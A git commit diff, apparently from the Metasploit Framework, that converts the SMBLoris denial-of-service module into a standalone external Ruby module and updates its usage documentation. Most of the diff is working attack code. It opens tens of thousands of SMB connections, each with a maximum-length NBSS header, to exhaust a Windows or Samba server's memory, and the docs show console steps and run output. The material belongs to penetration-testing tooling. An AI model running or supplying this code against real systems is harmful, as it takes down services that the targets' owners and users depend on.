Convert SMBLoris to an external module
Adam Cammack
parent
71149e9c68
commit
5ece14b064
|
|
@ -3,7 +3,7 @@
|
|||
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
|
||||
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
|
||||
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
|
||||
|
||||
|
||||
The module opens over 64,000 connections to the target service, so please make sure
|
||||
your system ULIMIT is set appropriately to handle it. A single host running this module
|
||||
can theoretically consume up to 8GB of memory on the target.
|
||||
|
|
@ -14,7 +14,7 @@
|
|||
|
||||
1. Start msfconsole
|
||||
1. Do: `use auxiliary/dos/smb/smb_loris`
|
||||
1. Do: `set RHOST [IP]`
|
||||
1. Do: `set rhost [IP]`
|
||||
1. Do: `run`
|
||||
1. Target should allocate increasing amounts of memory.
|
||||
|
||||
|
|
@ -30,14 +30,11 @@ msf auxiliary(smb_loris) >
|
|||
|
||||
msf auxiliary(smb_loris) > run
|
||||
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
|
||||
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
|
||||
....
|
||||
[*] Starting server...
|
||||
[*] 192.168.172.138:445 - 100 socket(s) open
|
||||
[*] 192.168.172.138:445 - 200 socket(s) open
|
||||
...
|
||||
[!] 192.168.172.138:445 - At open socket limit with 4000 sockets open. Try increasing you system limits.
|
||||
[*] 192.168.172.138:445 - Holding steady at 4000 socket(s) open
|
||||
...
|
||||
```
|
||||
|
|
|
|||
|
|
@ -1,89 +1,95 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
#!/usr/bin/env ruby
|
||||
|
||||
require 'socket'
|
||||
require 'metasploit'
|
||||
|
||||
require 'bindata'
|
||||
require 'ruby_smb'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
class NbssHeader < BinData::Record
|
||||
endian :little
|
||||
uint8 :message_type
|
||||
bit7 :flags
|
||||
bit17 :message_length
|
||||
end
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'SMBLoris NBSS Denial of Service',
|
||||
'Description' => %q{
|
||||
The SMBLoris attack consumes large chunks of memory in the target by sending
|
||||
SMB requests with the NetBios Session Service(NBSS) Length Header value set
|
||||
to the maximum possible value. By keeping these connections open and initiating
|
||||
large numbers of these sessions, the memory does not get freed, and the server
|
||||
grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
|
||||
and Zach Harding.
|
||||
|
||||
DISCALIMER: This module opens a lot of simultaneous connections. Please check
|
||||
your system's ULIMIT to make sure it can handle it. This module will also run
|
||||
continuously until stopped.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'thelightcosine'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://smbloris.com/' ]
|
||||
],
|
||||
'DisclosureDate' => 'Jul 29 2017'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(445)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
header = NbssHeader.new
|
||||
header.message_length = 0x01FFFF
|
||||
|
||||
linger = Socket::Option.linger(true, 60)
|
||||
|
||||
while true do
|
||||
sockets = {}
|
||||
(1025..65535).each do |src_port|
|
||||
print_status "Sending packet from Source Port: #{src_port}"
|
||||
opts = {
|
||||
'CPORT' => src_port,
|
||||
'ConnectTimeout' => 360
|
||||
}
|
||||
|
||||
if sockets[src_port]
|
||||
disconnect(sockets[src_port])
|
||||
end
|
||||
|
||||
begin
|
||||
nsock = connect(false, opts)
|
||||
nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
|
||||
nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
|
||||
nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
|
||||
nsock.setsockopt(linger)
|
||||
nsock.write(header.to_binary_s)
|
||||
sockets[src_port] = nsock
|
||||
rescue ::Exception => e
|
||||
print_error "Exception sending packet: #{e.message}"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
class NbssHeader < BinData::Record
|
||||
endian :little
|
||||
uint8 :message_type
|
||||
bit7 :flags
|
||||
bit17 :message_length
|
||||
end
|
||||
|
||||
metadata = {
|
||||
name: 'SMBLoris NBSS Denial of Service',
|
||||
description: %q{
|
||||
The SMBLoris attack consumes large chunks of memory in the target by sending
|
||||
SMB requests with the NetBios Session Service(NBSS) Length Header value set
|
||||
to the maximum possible value. By keeping these connections open and initiating
|
||||
large numbers of these sessions, the memory does not get freed, and the server
|
||||
grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
|
||||
and Zach Harding.
|
||||
|
||||
DISCALIMER: This module opens a lot of simultaneous connections. Please check
|
||||
your system's ULIMIT to make sure it can handle it. This module will also run
|
||||
continuously until stopped.
|
||||
},
|
||||
authors: [
|
||||
'thelightcosine',
|
||||
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||
],
|
||||
date: '2017-06-29',
|
||||
references: [
|
||||
{ type: 'url', ref: 'http://smbloris.com/' }
|
||||
],
|
||||
type: 'dos',
|
||||
options: {
|
||||
rhost: {type: 'address', description: 'The target address', required: true, default: nil},
|
||||
rport: {type: 'port', description: 'SMB port on the target', required: true, default: 445},
|
||||
}
|
||||
}
|
||||
|
||||
def run(args)
|
||||
header = NbssHeader.new
|
||||
header.message_length = 0x01FFFF
|
||||
|
||||
last_reported = 0
|
||||
warned = false
|
||||
n_loops = 0
|
||||
sockets = []
|
||||
|
||||
target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)
|
||||
|
||||
Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "
|
||||
|
||||
while true do
|
||||
begin
|
||||
sockets.delete_if do |s|
|
||||
s.closed?
|
||||
end
|
||||
|
||||
nsock = target.connect(timeout: 360)
|
||||
nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
|
||||
nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
|
||||
nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
|
||||
nsock.setsockopt(Socket::Option.linger(true, 60))
|
||||
nsock.write(header.to_binary_s)
|
||||
sockets << nsock
|
||||
|
||||
n_loops += 1
|
||||
if last_reported != sockets.length
|
||||
if n_loops % 100 == 0
|
||||
last_reported = sockets.length
|
||||
Metasploit.log "#{sockets.length} socket(s) open", level: 'info'
|
||||
end
|
||||
elsif n_loops % 1000 == 0
|
||||
Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'
|
||||
end
|
||||
rescue Interrupt
|
||||
break
|
||||
sockets.each &:close
|
||||
rescue Errno::EMFILE
|
||||
Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing you system limits.", level: 'warning' unless warned
|
||||
warned = true
|
||||
sockets.slice(0).close
|
||||
rescue Exception => e
|
||||
Metasploit.log "Exception sending packet: #{e.message}", level: 'error'
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
if __FILE__ == $PROGRAM_NAME
|
||||
Metasploit.run(metadata, method(:run))
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue